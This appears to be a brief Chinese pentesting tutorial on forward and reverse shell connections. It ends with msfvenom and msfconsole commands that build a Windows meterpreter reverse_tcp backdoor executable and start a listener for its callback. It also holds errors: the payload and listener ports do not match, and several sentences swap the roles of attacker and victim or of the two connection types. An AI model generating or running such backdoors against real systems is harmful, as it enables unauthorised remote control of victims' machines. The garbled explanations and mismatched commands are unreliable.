内网:正向连接与反向连接
正向连接和反向连接(以攻击机为参照)
正向连接(攻击机主动去连接受害主机)
正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接来控制受害主机。
即:攻击机主动连接被攻击机
反向连接 (受害主机出网 主动连接攻击机)
反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。所以此时需要在控制主机上监听一个端口,让受害机主动连接控制主机,从而实现对控制主机的控制。
由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制
即:被攻击机主动连接攻击机
在实战中,正向连接往往受限于被控主机上的防火墙屏蔽及权限不足等情况,而反向连接可以很好地突破这些限制
总结
- 如果被控主机出网,优先考虑使用反向连接
- 如果被控主机有公网ip又不出网,考虑使用正向连接
MSF上线操作(生成后面与监听)
生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
原作者:~Echo